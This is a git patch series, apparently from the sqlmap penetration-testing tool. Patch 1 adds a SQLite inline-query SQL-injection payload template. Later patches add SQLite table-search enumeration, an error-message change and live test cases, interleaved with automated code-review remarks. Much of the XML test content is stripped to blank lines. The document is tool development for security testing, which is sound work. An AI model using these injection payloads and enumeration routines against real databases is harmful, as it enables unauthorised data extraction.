From 48e0154fc3dd6645e8a48fa7497b6ca733b34499 Mon Sep 17 00:00:00 2001 From: Bernardo Damele Date: Mon, 14 Jan 2013 15:30:01 +0000 Subject: [PATCH 1/5] added SQLite inline queries payload --- xml/payloads.xml | 19 +++++++++++++++++++ 1 file changed, 19 insertions(+) diff --git a/xml/payloads.xml b/xml/payloads.xml index 6e9155ff2..d9cb48b22 100644 --- a/xml/payloads.xml +++ b/xml/payloads.xml @@ -1977,6 +1977,25 @@ Formats: Oracle + + + SQLite inline queries + 6 + 1 + 1 + 1,2,3,8 + 3 + SELECT '[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]' + + SELECT '[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))||'[DELIMITER_STOP]' + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ SQLite +
+
From e555c2be30e538f028ec5fccebf064872b5e8c56 Mon Sep 17 00:00:00 2001
From: Bernardo Damele
Date: Mon, 14 Jan 2013 16:26:11 +0000
Subject: [PATCH 2/5] added support for --search -T for SQLite
---
 plugins/generic/search.py | 85 +++++++++++++++++++++++----------------
 xml/queries.xml | 5 ++-
 2 files changed, 54 insertions(+), 36 deletions(-)
diff --git a/plugins/generic/search.py b/plugins/generic/search.py
index 4edbfa8c6..a79ff9093 100644
--- a/plugins/generic/search.py
+++ b/plugins/generic/search.py
@@ -193,6 +193,16 @@ class Search:
 query += whereDbsQuery
 values = inject.getValue(query, blind=False, time=False)
+ if Backend.isDbms(DBMS.SQLITE):
+ newValues = []
+
+ if isinstance(values, basestring):
+ values = [values]
+ for value in values:
+ newValues.append(["SQLite_masterdb", value])
+
+ values = newValues
+
 for foundDb, foundTbl in filterPairValues(values):
 foundDb = safeSQLIdentificatorNaming(foundDb)
 foundTbl = safeSQLIdentificatorNaming(foundTbl, True)
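Review bot: The new SQLite branch iterates `values` unconditionally, so a `None` result from `inject.getValue` (a bare string is normalised, `None` is not) would raise a TypeError in `for value in values`, whereas the non-SQLite path hands whatever came back straight to `filterPairValues`; if `getValue` can return `None` here, which I cannot confirm from the hunk, the loop needs a guard. The append loop can also collapse into one expression that covers that case: `if isinstance(values, basestring):` / `    values = [values]` / `values = [["SQLite_masterdb", value] for value in (values or [])]`. The literal `"SQLite_masterdb"` is introduced here and reused twice in the next hunk (`foundTbls["SQLite_masterdb"] = []`), so a module-level constant such as `SQLITE_MASTERDB = "SQLite_masterdb"` would keep the three sites in step, and a comment on the branch, `# SQLite results carry no database name, so every hit is filed under one pseudo-database`, would say why the pairing exists. The enclosing method starts before this hunk.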
@@ -205,47 +215,50 @@ class Search: else: foundTbls[foundDb] = [foundTbl] else: - infoMsg = "fetching number of databases with table" - if tblConsider == "1": - infoMsg += "s like" - infoMsg += " '%s'" % unsafeSQLIdentificatorNaming(tbl) - logger.info(infoMsg) - - query = rootQuery.blind.count - query += tblQuery - query += whereDbsQuery - count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) - - if not isNumPosStrValue(count): - warnMsg = "no databases have table" + if not Backend.isDbms(DBMS.SQLITE): + infoMsg = "fetching number of databases with table" if tblConsider == "1": - warnMsg += "s like" - warnMsg += " '%s'" % unsafeSQLIdentificatorNaming(tbl) - logger.warn(warnMsg) + infoMsg += "s like" + infoMsg += " '%s'" % unsafeSQLIdentificatorNaming(tbl) + logger.info(infoMsg) - continue - - indexRange = getLimitRange(count) - - for index in indexRange: - query = rootQuery.blind.query + query = rootQuery.blind.count query += tblQuery query += whereDbsQuery - if Backend.isDbms(DBMS.DB2): - query += ") AS foobar" - query = agent.limitQuery(index, query) + count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) - foundDb = unArrayizeValue(inject.getValue(query, union=False, error=False)) - foundDb = safeSQLIdentificatorNaming(foundDb) + if not isNumPosStrValue(count): + warnMsg = "no databases have table" + if tblConsider == "1": + warnMsg += "s like" + warnMsg += " '%s'" % unsafeSQLIdentificatorNaming(tbl) + logger.warn(warnMsg) - if foundDb not in foundTbls: - foundTbls[foundDb] = [] + continue + + indexRange = getLimitRange(count) + + for index in indexRange: + query = rootQuery.blind.query + query += tblQuery + query += whereDbsQuery + if Backend.isDbms(DBMS.DB2): + query += ") AS foobar" + query = agent.limitQuery(index, query) + + foundDb = unArrayizeValue(inject.getValue(query, union=False, error=False)) + foundDb = 
safeSQLIdentificatorNaming(foundDb) + + if foundDb not in foundTbls: + foundTbls[foundDb] = [] + + if tblConsider == "2": + foundTbls[foundDb].append(tbl) if tblConsider == "2": - foundTbls[foundDb].append(tbl) - - if tblConsider == "2": - continue + continue + else: + foundTbls["SQLite_masterdb"] = [] for db in foundTbls.keys(): db = safeSQLIdentificatorNaming(db) @@ -257,7 +270,8 @@ class Search: logger.info(infoMsg) query = rootQuery.blind.count2 - query = query % unsafeSQLIdentificatorNaming(db) + if not Backend.isDbms(DBMS.SQLITE): + query = query % unsafeSQLIdentificatorNaming(db) query += " AND %s" % tblQuery count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) @@ -275,7 +289,8 @@ class Search: for index in indexRange: query = rootQuery.blind.query2 - query = query % unsafeSQLIdentificatorNaming(db) + if not Backend.isDbms(DBMS.SQLITE): + query = query % unsafeSQLIdentificatorNaming(db) query += " AND %s" % tblQuery query = agent.limitQuery(index, query) diff --git a/xml/queries.xml b/xml/queries.xml index d7db742c0..3a186642e 100644 --- a/xml/queries.xml +++ b/xml/queries.xml @@ -347,7 +347,10 @@ - + + + + From 413b5e7ab45a9bdc92b0b8212cf1fd4627c349db Mon Sep 17 00:00:00 2001 From: Bernardo Damele Date: Mon, 14 Jan 2013 16:49:05 +0000 Subject: [PATCH 3/5] fixed error message --- plugins/dbms/sqlite/enumeration.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/plugins/dbms/sqlite/enumeration.py b/plugins/dbms/sqlite/enumeration.py index 9a43db908..40a0f0ef2 100644 --- a/plugins/dbms/sqlite/enumeration.py +++ b/plugins/dbms/sqlite/enumeration.py @@ -56,7 +56,7 @@ class Enumeration(GenericEnumeration): return [] def searchColumn(self): - errMsg = "on SQLite you must specify the table and columns to dump" + errMsg = "on SQLite it is not possible to search columns" raise SqlmapUnsupportedFeatureException(errMsg) def getHostname(self): 
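Review bot: The rewritten `else:` branch now contains nothing but an `if not Backend.isDbms(DBMS.SQLITE): … else:` pair, so the whole reindented non-SQLite block could sit one level shallower as `elif not Backend.isDbms(DBMS.SQLITE):` with the SQLite assignment as the final `else:`. On the SQLite side the exact-name case (`tblConsider == "2"`) no longer records `tbl` and `continue`s the way the other backends do; it falls through to the `for db in foundTbls.keys()` loop, which looks intended because that loop re-queries with `tblQuery`, but the asymmetry deserves a comment such as `# SQLite: nothing to count per database, the per-db loop below resolves the table names`. The enclosing method starts before this hunk and the hunk itself is split across two physical lines here.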
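Review bot: The guard `if not Backend.isDbms(DBMS.SQLITE):` around `query = query % unsafeSQLIdentificatorNaming(db)` is added in this hunk for `count2` and again in the following hunk for `query2`, with nothing explaining why the SQLite templates are exempt, and the queries.xml hunk that presumably drops the placeholder is not legible in this rendering. A comment at the first site, `# SQLite templates carry no database placeholder (single pseudo-database), so skip the substitution`, would document the coupling to queries.xml, or a two-line local helper that applies the substitution conditionally would keep the condition in one place for both templates. Both sites sit inside the `for db in foundTbls.keys()` loop whose enclosing method starts before these hunks.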
From 8a2b994b9418e64f1196e30bc7e7fa2f4556b3dd Mon Sep 17 00:00:00 2001 From: Bernardo Damele Date: Mon, 14 Jan 2013 16:50:24 +0000 Subject: [PATCH 4/5] added SQLite test cases (issue #312) --- xml/livetests.xml | 284 ++++++++++++++++++++++++++++++++++++++++++++-- 1 file changed, 272 insertions(+), 12 deletions(-) diff --git a/xml/livetests.xml b/xml/livetests.xml index 84fafe529..548bacf65 100644 --- a/xml/livetests.xml +++ b/xml/livetests.xml @@ -10,6 +10,7 @@ + @@ -473,6 +474,150 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + @@ -578,6 +723,39 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + @@ -1172,6 +1350,43 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + @@ -1183,7 +1398,7 @@ - + @@ -1194,7 +1409,7 @@ - + @@ -1205,7 +1420,7 @@ - + @@ -1216,7 +1431,7 @@ - + @@ -1227,7 +1442,7 @@ - + @@ -1239,7 +1454,7 @@ - + @@ -1250,7 +1465,7 @@ - + @@ -1261,7 +1476,7 @@ - + @@ -1272,7 +1487,7 @@ - + @@ -1283,7 +1498,7 @@ - + @@ -1294,7 +1509,7 @@ - + @@ -1306,7 +1521,52 @@ - + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + From 3fa720e699f5f270516b0ce2b7ae0ac1c4e0f957 Mon Sep 17 00:00:00 2001 From: Bernardo Damele Date: Mon, 14 Jan 2013 17:30:42 +0000 Subject: [PATCH 5/5] added first Oracle test cases --- xml/livetests.xml | 243 +++++++++++++++++++++++++++++++++++++++++++++- 1 file changed, 238 insertions(+), 5 deletions(-) diff --git a/xml/livetests.xml b/xml/livetests.xml index 548bacf65..21015e621 100644 --- a/xml/livetests.xml +++ b/xml/livetests.xml @@ -49,7 +49,7 @@ - + @@ -93,7 +93,7 @@ - + @@ -137,7 +137,7 @@ - + @@ -181,7 +181,7 @@ - + @@ -239,7 +239,7 @@ - + 
@@ -474,6 +474,239 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +